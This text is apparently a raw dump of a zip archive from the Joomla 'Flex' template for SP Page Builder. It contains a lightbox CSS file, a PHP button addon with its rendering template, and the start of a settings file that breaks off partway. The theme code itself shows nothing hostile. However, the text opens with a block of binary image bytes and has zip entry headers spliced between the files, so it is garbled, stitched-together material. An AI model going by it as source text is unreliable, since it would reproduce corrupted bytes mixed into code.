o���\��Y_�J䴚R��;�w{�d�(��z϶r�����;���j�ڢ�����Dc��g *�c�{��}��bA0k�J�B�x�Q#�5��v�<��
��lL��PP&�&aF	eo�;'
��;8�,�	Œш ��(4ؽ��u6/����E�a�����Y��1�7E��1�o�{�y
�&$����Kf���ҧe�OGV����t�j/2�8w}r�;�b�M���,����{��p����|pjn���!
2�K�Pb-�:�\呒Ӡ=8��C�O�b����o��at}zu���q^F)U�V`�ro���4Kzq�Fqř�ˑT�fM�O�1s͚�$n^�%y��X�[�Q/z�iЙ�>�Jd׭p	N����tK���`�����R,�p���g[0��%:m�ż_�,�s��L���.M7��EڎY��T��]���vT�z���u1�Qo�2,e?ڌ���Y�e�(�������]�n��)k݃
5L��b3��|�~��)|4�5n�=��eYG��!�kP��
�ϡ�2LDr,H!�Ƹԁ����z���ay<����Ȝ�+�B��0�߮v���*t�l"�|�|^LK-mpL8�FN�J��b���
�Ҟ,KA'��T���HR�����,�����<�����Q1Ŕϑ��m�;�*h�=���M����}�Y��gl*�L)w����
�7I<�b���f@��]�k�T@UR����H��je.��F�A���F�����9�@)�v�`\��Ch\$’bD���Vy�f�7#�4�&l��z���v��c�s*6%w��K�����lu�ڬ���+g�/��AR@Ü߳R��eX�׸,i�a��`p���g�{�s!Ʌ�B�;ЎO�;����inyY�C=��D-}Op��R*wk�S[�1�t����g��<�f�$�.��mEU�2�l�!@��`o��,�R�B����:��콊�OJx\��IJۏ��S�u,��Xj�~�Y��GS�HG����F�Lv������L?#�ʅ�����S�[Q�� �J�W��ꏟr˿+��P��z���O��L�����6ݠC%|��#�b�K��0��0�	X/�0�|���ËB�`S��Z��IEND�B`�PK!=ء���?flex/sppagebuilder/addons/lightbox/assets/css/imagelightbox.cssnu&1i� 
/* Shuffle */
.shuffle-item{margin-left:0}.sppb-lightbox{padding:0}.sppb-addon-lightbox:after,.sppb-addon-lightbox:before{content:" ";display:block}.sppb-addon-lightbox:after{clear:both}

/* Lightbox */
 .sppb-lightbox{list-style:none;padding:0;margin:0 auto}.sppb-lightbox li{float:left;display:inline-block;padding:0;margin-left:0!important}.sppb-lightbox li .overlay{opacity:1;position:relative;top:0;bottom:0;left:0;right:0;text-align:center;padding:0;margin:0;border:0;transition:all ease-in-out;-webkit-transition:all .3s ease-in-out;color:#fff}.sppb-lightbox li:hover .overlay{opacity:1;-webkit-filter:brightness(.9) contrast(1.2);-moz-filter:brightness(.9) contrast(1.2);-ms-filter:brightness(.9) contrast(1.2);-o-filter:brightness(.9) contrast(1.2);filter:brightness(.9) contrast(1.2)}.sppb-lightbox li a{display:block}.sppb-lightbox li a:after{opacity:0;overflow:hidden;content:"";position:absolute;left:0;top:0;width:100%;height:100%;transition:all ease-in-out;-webkit-transition:all .3s ease-in-out;box-shadow:inset 0 0 40px rgba(0,0,0,.2)}.sppb-lightbox li:hover a:after{opacity:1;box-shadow:inset 0 0 0 10px rgba(0,0,0,.2),inset 0 0 50px rgba(0,0,0,.5)}.sppb-lightbox li.small a:after{box-shadow:inset 0 0 0 0 rgba(0,0,0,.05)}.sppb-lightbox li.small:hover a:after{box-shadow:inset 0 0 0 6px rgba(0,0,0,.3)}.sppb-lightbox li a .ap-plus-1{opacity:0;z-index:1;font-family:ap-arrows;font-style:normal;font-weight:100;font-variant:normal;text-transform:none;width:40px;height:40px;line-height:40px;text-align:center;font-size:20px;position:absolute;left:50%;top:50%;margin:-20px 0 0 -20px;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.3);background:rgba(0,0,0,.57);color:#fff;transition:opacity .3s ease-in-out .2s,background .3s ease-in-out,transform .3s ease-in-out .2s;-webkit-transition:opacity .3s ease-in-out .2s,background .3s ease-in-out,transform .3s ease-in-out .2s;-webkit-transform:scale3d(.5,.5,1);transform:scale3d(.5,.5,1)}.sppb-lightbox li:hover a .ap-plus-1{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}.sppb-lightbox li a .ap-plus-1:hover{opacity:1}#imagelightbox{cursor:pointer;position:fixed;z-index:10000;-ms-touch-action:none;touch-action:none;-webkit-box-shadow:0 0 3.125em rgba(0,0,0,.5);box-shadow:0 0 3.125em rgba(0,0,0,.5)}#imagelightbox-loading,#imagelightbox-loading div{border-radius:50%}#imagelightbox-loading{width:2.5em;height:2.5em;background-color:#444;background-color:rgba(0,0,0,.5);position:fixed;z-index:10003;top:50%;left:50%;padding:.625em;margin:-1.25em 0 0 -1.25em;-webkit-box-shadow:0 0 2.5em rgba(0,0,0,.75);box-shadow:0 0 2.5em rgba(0,0,0,.75)}#imagelightbox-loading div{width:1.25em;height:1.25em;background-color:#fff;-webkit-animation:imagelightbox-loading .5s ease infinite;animation:imagelightbox-loading .5s ease infinite}@-webkit-keyframes imagelightbox-loading{from,to{opacity:.5;-webkit-transform:scale(.75)}50%{opacity:1;-webkit-transform:scale(1)}}@keyframes imagelightbox-loading{from,to{opacity:.5;transform:scale(.75)}50%{opacity:1;transform:scale(1)}}#imagelightbox-overlay{background-color:#fff;background-color:rgba(255,255,255,.85);position:fixed;z-index:9998;top:0;right:0;bottom:0;left:0}#imagelightbox-close{width:2em;height:2em;text-align:left;background-color:#999;background-color:rgba(0,0,0,.2);border-radius:50%;position:fixed;z-index:10002;top:2.5em;right:2.5em;border:none;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1);-webkit-transition:all .3s ease;transition:all .3s ease}#imagelightbox-close:focus,#imagelightbox-close:hover{background-color:#777;background-color:rgba(0,0,0,.4);-webkit-transform:scale3d(1.2,1.2,1);transform:scale3d(1.2,1.2,1)}#imagelightbox-close:after,#imagelightbox-close:before{width:2px;background-color:#fff;content:'';position:absolute;top:20%;bottom:20%;left:50%;margin-left:-1px}#imagelightbox-close:before{-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}#imagelightbox-close:after{-webkit-transform:rotate(-45deg);-ms-transform:rotate(-45deg);transform:rotate(-45deg)}#imagelightbox-caption{text-align:center;color:#fff;font-size:110%;background-color:#777;background-color:rgba(0,0,0,.7);position:fixed;z-index:10001;left:0;right:0;bottom:0;padding:.625em}#imagelightbox-nav{background-color:#444;background-color:rgba(0,0,0,.5);border-radius:20px;position:fixed;z-index:10001;left:50%;bottom:3.75em;padding:.313em;-webkit-transform:translateX(-50%);-ms-transform:translateX(-50%);transform:translateX(-50%)}#imagelightbox-nav button{width:1em;height:1em;background-color:transparent;border:1px solid #fff;border-radius:50%;display:inline-block;margin:0 .313em}#imagelightbox-nav button.active{background-color:#fff}.imagelightbox-arrow>i{font-family:ap-arrows;speak:none;font-style:normal;font-weight:400;font-variant:normal;text-transform:none;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.imagelightbox-arrow{width:3.75em;height:7.5em;background-color:#444;background-color:rgba(0,0,0,.3);border:none;vertical-align:middle;display:none;position:fixed;z-index:10001;top:50%;border-radius:3px;margin-top:-3.75em;-webkit-transition:color .3s ease,background-color .3s ease;transition:color .3s ease,background-color .3s ease}.imagelightbox-arrow:focus,.imagelightbox-arrow:hover{background-color:#666;background-color:rgba(0,0,0,.55)}.imagelightbox-arrow:active{background-color:#444;background-color:rgba(0,0,0,.75)}.imagelightbox-arrow-left{left:2.5em}.imagelightbox-arrow-left>i{margin-left:-2px}.imagelightbox-arrow-left>i,.imagelightbox-arrow-right>i{font-size:220%;color:#fff}.imagelightbox-arrow-right{right:2.5em}.imagelightbox-arrow-right>i{margin-right:-4px}#imagelightbox-close,#imagelightbox-loading,#imagelightbox-nav,#imagelightbox-overlay,.imagelightbox-arrow{-webkit-animation:fade-in .25s ease;animation:fade-in .25s ease}#imagelightbox-caption{-webkit-animation:fade-in-up .5s ease;animation:fade-in-up .5s ease}@-webkit-keyframes fade-in{from{opacity:0}to{opacity:1}}@keyframes fade-in{from{opacity:0}to{opacity:1}}@-webkit-keyframes fade-in-up{from{opacity:0;-webkit-transform:translateY(30px)}to{opacity:1;-webkit-transform:translateY(0)}}@keyframes fade-in-up{from{opacity:0;transform:translateY(30px)}to{opacity:1;transform:translateY(0)}}@media (max-width:767px){#imagelightbox-close{top:1.25em;right:1.25em}#imagelightbox-nav{bottom:1.25em}.imagelightbox-arrow{width:2.5em;height:3.75em;margin-top:-1.75em}.imagelightbox-arrow-left{left:1.25em}.imagelightbox-arrow-right{right:1.25em}.imagelightbox-arrow-left>i,.imagelightbox-arrow-right>i{font-size:180%;line-height:130%}}@media (max-width:480px){.sppb-lightbox .shuffle-item,.sppb-lightbox .shuffle-item img,.img-item,.img-item img{width:100%}.imagelightbox-arrow-left{left:0}.imagelightbox-arrow-right{right:0}}PK!4��r7r7)flex/sppagebuilder/addons/button/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted aceess');

class SppagebuilderAddonButton extends SppagebuilderAddons {

    public function render() {
        $alignment = (isset($this->addon->settings->alignment) && $this->addon->settings->alignment) ? $this->addon->settings->alignment : 'sppb-text-center';
        $class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? ' ' . $this->addon->settings->class : '';
        $class .= (isset($this->addon->settings->type) && $this->addon->settings->type) ? ' sppb-btn-' . $this->addon->settings->type : '';
        $class .= (isset($this->addon->settings->size) && $this->addon->settings->size) ? ' sppb-btn-' . $this->addon->settings->size : '';
        $class .= (isset($this->addon->settings->block) && $this->addon->settings->block) ? ' ' . $this->addon->settings->block : '';
        $class .= (isset($this->addon->settings->shape) && $this->addon->settings->shape) ? ' sppb-btn-' . $this->addon->settings->shape : ' sppb-btn-rounded';
        $class .= (isset($this->addon->settings->appearance) && $this->addon->settings->appearance) ? ' sppb-btn-' . $this->addon->settings->appearance : '';
        $attribs = (isset($this->addon->settings->target) && $this->addon->settings->target) ? ' target="' . $this->addon->settings->target . '"' : '';
        $attribs .= (isset($this->addon->settings->url) && $this->addon->settings->url) ? ' href="' . $this->addon->settings->url . '"' : '';
        $attribs .= ' id="btn-' . $this->addon->id . '"';
        $text = (isset($this->addon->settings->text) && $this->addon->settings->text) ? $this->addon->settings->text : '';
		
		$button_block = (isset($this->addon->settings->block) && $this->addon->settings->block) ? $this->addon->settings->block : '';
		
		//Pixeden Icons
		$button_peicon = (isset($this->addon->settings->button_peicon) && $this->addon->settings->button_peicon) ? $this->addon->settings->button_peicon : '';
        $icon = (isset($this->addon->settings->icon) && $this->addon->settings->icon) ? $this->addon->settings->icon : '';
        $icon_position = (isset($this->addon->settings->icon_position) && $this->addon->settings->icon_position) ? $this->addon->settings->icon_position : 'left';

		if($icon_position == 'left') {
			if ($button_peicon != '') {
				$text = ($button_peicon) ? '<i style="margin-left:-1px;margin-right:5px;" class="pe ' . $button_peicon . '"></i> ' . $text : $text;
			}else{
				$text = ($icon) ? '<i class="fa ' . $icon . '"></i> ' . $text : $text;
			}
		} else {
			if ($button_peicon != '') {
				$text = ($button_peicon) ? $text . ' <i style="margin-left:5px;margin-right:-1px;" class="pe ' . $button_peicon . '"></i>' : $text;
			}else{
				$text = ($icon) ? $text . ' <i style="margin-left:5px;margin-right:-1px;" class="fa ' . $icon . '"></i>' : $text;
			}
		}
		
		// Alignment
		$css_align = '';
		if ($button_block != 'sppb-btn-block') {
			if($alignment == 'sppb-text-left'){
				$css_align .= ' style="float:left;"';
			} elseif( $alignment == 'sppb-text-right' ){
				$css_align .= ' style="float:right;"';
			} elseif( $alignment == 'sppb-text-center' ){
				$css_align .= ' style="float:none;margin-left:auto;margin-right:auto;display:table;"';
			}
		} else {
			$css_align .= ' style="display:block;"';
		}
			

        $output = '<div'. $css_align .' class="' . $alignment . '">';
        $output .= '<a' . $attribs . ' class="sppb-btn ' . $class . '">' . $text . '</a>';
        $output .= '</div>';

        return $output;
    }

    public function css() {
        $addon_id = '#sppb-addon-' . $this->addon->id;
        $layout_path = JPATH_ROOT . '/components/com_sppagebuilder/layouts';

        $css_path = new JLayoutFile('addon.css.button', $layout_path);

        $options = new stdClass;
        $options->button_type = (isset($this->addon->settings->type) && $this->addon->settings->type) ? $this->addon->settings->type : '';
        $options->button_appearance = (isset($this->addon->settings->appearance) && $this->addon->settings->appearance) ? $this->addon->settings->appearance : '';
        $options->button_color = (isset($this->addon->settings->color) && $this->addon->settings->color) ? $this->addon->settings->color : '';
        $options->button_color_hover = (isset($this->addon->settings->color_hover) && $this->addon->settings->color_hover) ? $this->addon->settings->color_hover : '';
        $options->button_background_color = (isset($this->addon->settings->background_color) && $this->addon->settings->background_color) ? $this->addon->settings->background_color : '';
        $options->button_background_color_hover = (isset($this->addon->settings->background_color_hover) && $this->addon->settings->background_color_hover) ? $this->addon->settings->background_color_hover : '';
        $options->button_fontstyle = (isset($this->addon->settings->fontstyle) && $this->addon->settings->fontstyle) ? $this->addon->settings->fontstyle : '';
        $options->button_font_style = (isset($this->addon->settings->font_style) && $this->addon->settings->font_style) ? $this->addon->settings->font_style : '';
        $options->button_padding = (isset($this->addon->settings->button_padding) && $this->addon->settings->button_padding) ? $this->addon->settings->button_padding : '';
        $options->button_padding_sm = (isset($this->addon->settings->button_padding_sm) && $this->addon->settings->button_padding_sm) ? $this->addon->settings->button_padding_sm : '';
        $options->button_padding_xs = (isset($this->addon->settings->button_padding_xs) && $this->addon->settings->button_padding_xs) ? $this->addon->settings->button_padding_xs : '';
        $options->fontsize = (isset($this->addon->settings->fontsize) && $this->addon->settings->fontsize) ? $this->addon->settings->fontsize : '';
        $options->fontsize_sm = (isset($this->addon->settings->fontsize_sm) && $this->addon->settings->fontsize_sm) ? $this->addon->settings->fontsize_sm : '';
        $options->fontsize_xs = (isset($this->addon->settings->fontsize_xs) && $this->addon->settings->fontsize_xs) ? $this->addon->settings->fontsize_xs : '';
        $options->button_letterspace = (isset($this->addon->settings->letterspace) && $this->addon->settings->letterspace) ? $this->addon->settings->letterspace : '';
        $options->button_background_gradient = (isset($this->addon->settings->background_gradient) && $this->addon->settings->background_gradient) ? $this->addon->settings->background_gradient : new stdClass();
        $options->button_background_gradient_hover = (isset($this->addon->settings->background_gradient_hover) && $this->addon->settings->background_gradient_hover) ? $this->addon->settings->background_gradient_hover : new stdClass();

        return $css_path->render(array('addon_id' => $addon_id, 'options' => $options, 'id' => 'btn-' . $this->addon->id));
    }

    public static function getTemplate() {
        $output = '
		<#
			var modern_font_style = false;
			var classList = data.class;
			classList += " sppb-btn-"+data.type;
			classList += " sppb-btn-"+data.size;
			classList += " sppb-btn-"+data.shape;
			if(!_.isEmpty(data.appearance)){
				classList += " sppb-btn-"+data.appearance;
			}

			classList += " "+data.block;

			var button_fontstyle = data.fontstyle || "";
			var button_font_style = data.font_style || "";

			var button_padding = "";
			var button_padding_sm = "";
			var button_padding_xs = "";
			if(data.button_padding){
				if(_.isObject(data.button_padding)){
					if(_.trim(data.button_padding.md) !== ""){
						button_padding = _.split(data.button_padding.md, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(_.trim(data.button_padding.sm) !== ""){
						button_padding_sm = _.split(data.button_padding.sm, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}

					if(_.trim(data.button_padding.xs) !== ""){
						button_padding_xs = _.split(data.button_padding.xs, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				} else {
					if(_.trim(data.button_padding) !== ""){
						button_padding = _.split(data.button_padding, " ").map(item => {
							if(_.isEmpty(item)){
								return "0";
							}
							return item;
						}).join(" ")
					}
				}

			}
		#>
		<style type="text/css">

			#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-{{ data.type }}{
				letter-spacing: {{ data.letterspace }};

				<# if(_.isObject(button_font_style) && button_font_style.underline) { #>
					text-decoration: underline;
					<# modern_font_style = true #>
				<# } #>

				<# if(_.isObject(button_font_style) && button_font_style.italic) { #>
					font-style: italic;
					<# modern_font_style = true #>
				<# } #>

				<# if(_.isObject(button_font_style) && button_font_style.uppercase) { #>
					text-transform: uppercase;
					<# modern_font_style = true #>
				<# } #>

				<# if(_.isObject(button_font_style) && button_font_style.weight) { #>
					font-weight: {{ button_font_style.weight }};
					<# modern_font_style = true #>
				<# } #>

				<# if(!modern_font_style) { #>
					<# if(_.isArray(button_fontstyle)) { #>
						<# if(button_fontstyle.indexOf("underline") !== -1){ #>
							text-decoration: underline;
						<# } #>
						<# if(button_fontstyle.indexOf("uppercase") !== -1){ #>
							text-transform: uppercase;
						<# } #>
						<# if(button_fontstyle.indexOf("italic") !== -1){ #>
							font-style: italic;
						<# } #>
						<# if(button_fontstyle.indexOf("lighter") !== -1){ #>
							font-weight: lighter;
						<# } else if(button_fontstyle.indexOf("normal") !== -1){#>
							font-weight: normal;
						<# } else if(button_fontstyle.indexOf("bold") !== -1){#>
							font-weight: bold;
						<# } else if(button_fontstyle.indexOf("bolder") !== -1){#>
							font-weight: bolder;
						<# } #>
					<# } #>
				<# } #>
			}

			<# if(data.type == "custom"){ #>
				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
						<# if(_.isObject(data.fontsize)){ #>
							font-size: {{data.fontsize.md}}px;
						<# } else { #>
							font-size: {{data.fontsize}}px;
						<# } #>
					color: {{ data.color }};
					padding: {{ button_padding }};
					<# if(data.appearance == "outline"){ #>
						border-color: {{ data.background_color }};
						background-color: transparent;
					<# } else if(data.appearance == "3d"){ #>
						border-bottom-color: {{ data.background_color_hover }};
						background-color: {{ data.background_color }};
					<# } else if(data.appearance == "gradient"){ #>
						border: none;
						<# if(typeof data.background_gradient.type !== "undefined" && data.background_gradient.type == "radial"){ #>
							background-image: radial-gradient(at {{ data.background_gradient.radialPos || "center center"}}, {{ data.background_gradient.color }} {{ data.background_gradient.pos || 0 }}%, {{ data.background_gradient.color2 }} {{ data.background_gradient.pos2 || 100 }}%);
						<# } else { #>
							background-image: linear-gradient({{ data.background_gradient.deg || 0}}deg, {{ data.background_gradient.color }} {{ data.background_gradient.pos || 0 }}%, {{ data.background_gradient.color2 }} {{ data.background_gradient.pos2 || 100 }}%);
						<# } #>
					<# } else { #>
						background-color: {{ data.background_color }};
					<# } #>
				}

				#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom:hover{
					color: {{ data.color_hover }};
					background-color: {{ data.background_color_hover }};
					<# if(data.appearance == "outline"){ #>
						border-color: {{ data.background_color_hover }};
					<# } else if(data.appearance == "gradient"){ #>
						<# if(typeof data.background_gradient_hover.type !== "undefined" && data.background_gradient_hover.type == "radial"){ #>
							background-image: radial-gradient(at {{ data.background_gradient_hover.radialPos || "center center"}}, {{ data.background_gradient_hover.color }} {{ data.background_gradient_hover.pos || 0 }}%, {{ data.background_gradient_hover.color2 }} {{ data.background_gradient_hover.pos2 || 100 }}%);
						<# } else { #>
							background-image: linear-gradient({{ data.background_gradient_hover.deg || 0}}deg, {{ data.background_gradient_hover.color }} {{ data.background_gradient_hover.pos || 0 }}%, {{ data.background_gradient_hover.color2 }} {{ data.background_gradient_hover.pos2 || 100 }}%);
						<# } #>
					<# } #>
				}
				@media (min-width: 768px) and (max-width: 991px) {
					#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
						<# if(_.isObject(data.fontsize)){ #>
							font-size: {{data.fontsize.sm}}px;
						<# } #>
						padding: {{ button_padding_sm }};
					}
				}
				@media (max-width: 767px) {
					#sppb-addon-{{ data.id }} #btn-{{ data.id }}.sppb-btn-custom{
						<# if(_.isObject(data.fontsize)){ #>
							font-size: {{data.fontsize.xs}}px;
						<# } #>
						padding: {{ button_padding_xs }};
					}
				}
			<# } #>
		</style>
		<div class="{{ data.alignment }}">
			<a style="line-height:1px;" href=\'{{ data.url }}\' id="btn-{{ data.id }}" target="{{ data.target }}" class="sppb-btn {{ classList }}">
			   <# if(data.icon_position == "left") { #>
				  <# if(!_.isEmpty(data.button_peicon)) { #>
					<i style="margin-left:-1px;margin-right:5px;" class="pe {{ data.button_peicon }}"></i> {{ data.text }}
				  <# } else { #>
					<i class="fa {{ data.icon }}"></i> {{ data.text }}
				  <# } #>
				<# } #>
				<# if(data.icon_position == "right") { #>
				  <# if(!_.isEmpty(data.button_peicon)) { #>
					{{ data.text }} <i style="margin-left:5px;margin-right:-1px;" class="pe {{ data.button_peicon }}"></i>
				  <# } else { #>
					{{ data.text }} <i class="fa {{ data.icon }}"></i>
				  <# } #>	
			    <# } #>
			</a>
		</div>';

        return $output;
    }

}PK!��i�&�&*flex/sppagebuilder/addons/button/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

//Include Pixeden Icons
require_once dirname(dirname( __DIR__ )) . '/fields/pixeden-icons.php';

SpAddonsConfig::addonConfig(
	array(
		'type'=>'general',
		'addon_name'=>'sp_button',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
					'std'=>'Button',
				),

				'alignment'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_CONTENT_ALIGNMENT_DESC'),
					'values'=>array(
						'sppb-text-left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'sppb-text-center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'sppb-text-right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'std'=>'sppb-text-left',
				),

				'font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONT_FAMILY'),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-btn { font-family: {{ VALUE }}; }'
					)
				),

				'font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
				),

				'letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0'
				),

				'url'=>array(
					'type'=>'media',
					'format'=>'attachment',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_URL_DESC'),
					'placeholder'=>'http://',
					'hide_preview'=>true,
				),

				'target'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK_NEWTAB_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_SAME_WINDOW'),
						'_blank'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_TARGET_NEW_WINDOW'),
					),
					'depends'=>array(array('url', '!=', '')),
				),

				'type'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
					'values'=>array(
						'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
						'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
						'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
						'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
						'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
						'secondary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SECONDARY'),
						'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
						'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
						'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
						'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
						'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
						'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
					),
					'std'=>'custom',
				),

				'appearance'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
					'values'=>array(
						''=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
						'gradient'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
						'outline'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
						'3d'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
					),
					'std'=>'',
				),

				'button_status'=>array(
					'type'=>'buttons',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
					'std'=>'normal',
					'values'=>array(
						array(
							'label' => 'Normal',
							'value' => 'normal'
						),
						array(
							'label' => 'Hover',
							'value' => 'hover'
						),
					),
					'tabs' => true,
					'depends'=>array(
						array('type', '=', 'custom'),
					)
				),

				'background_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
					'std' => '#dc4a3e',
					'depends'=>array(
						array('appearance', '!=', 'gradient'),
						array('type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					)
				),

				'background_gradient'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std'=> array(
						"color" => "#fd6f64",
						"color2" => "#dc4a3e",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('appearance', '=', 'gradient'),
						array('type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					)
				),

				'color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
					'std' => '#FFFFFF',
					'depends'=>array(
						array('type', '=', 'custom'),
						array('button_status', '=', 'normal'),
					),
				),

				'background_color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
					'std' => '#00E66E',
					'depends'=>array(
						array('appearance', '!=', 'gradient'),
						array('type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					)
				),

				'background_gradient_hover'=>array(
					'type'=>'gradient',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
					'std'=> array(
						"color" => "#f77367",
						"color2" => "#f35546",
						"deg" => "45",
						"type" => "linear"
					),
					'depends'=>array(
						array('appearance', '=', 'gradient'),
						array('type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					)
				),

				'color_hover'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
					'std' => '#FFFFFF',
					'depends'=>array(
						array('type', '=', 'custom'),
						array('button_status', '=', 'hover'),
					),
				),

				'button_padding'=>array(
					'type'=>'padding',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
					'std' => '',
					'depends'=> array(
						array('type', '=', 'custom'),
					),
					'responsive'=>true
				),

				'size'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
					'values'=>array(
